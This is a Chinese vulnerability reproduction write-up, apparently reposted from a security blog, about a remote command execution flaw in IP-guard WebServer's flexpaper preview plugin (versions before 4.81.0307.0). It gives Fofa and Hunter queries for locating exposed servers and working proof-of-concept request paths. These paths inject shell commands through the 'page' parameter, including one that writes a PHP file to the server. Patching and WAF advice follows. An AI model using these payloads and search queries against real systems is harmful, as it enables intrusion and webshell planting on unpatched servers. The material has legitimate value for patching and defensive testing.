【IP-guard WebServer 远程命令执行漏洞复现(0day)】


一、漏洞说明

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard Webserver远程命令执行漏洞(RCE)的问题,是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,新版本已不再使用 flexpaper。


二、影响版本

受影响的范围,即有使用文件预览功能的web系统

溢信科技 IP-guard<4.81.0307.0

三、资产测绘

Fofa语法:
app="IP-guard"
Hunter语法:
web.title="IP-guard"

四、漏洞复现

1、来到web访问界面

2、bp抓包修改数据包
poc:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Esany.php
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+123456+>test.txt
/ipg/static/appr/lib/flexpaper/php/test.txt


可执行写入的命令,可造成重大危害。


五、修复建议

临时防护方案:

1.加强系统和网络的访问控制,修改防火墙策略,不将非必要服务暴露于公网;
2.在公网部署的系统,通过WAF限制外网对"/ipg/static/appr/lib/flexpaper/php/view.php"路径的访问;
3.定期对服务器上的网站后门文件进行及时查杀。

正式防护方案:

官方已修复该漏洞,建议用户更新到安全版本。
安全版本:
IP-guard WebServer >= 4.81.0307.0
下载链接:
https://www.ip-guard.***/

转载请说明出处内容投诉
CSS教程_站长资源网 » 【IP-guard WebServer 远程命令执行漏洞复现(0day)】

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买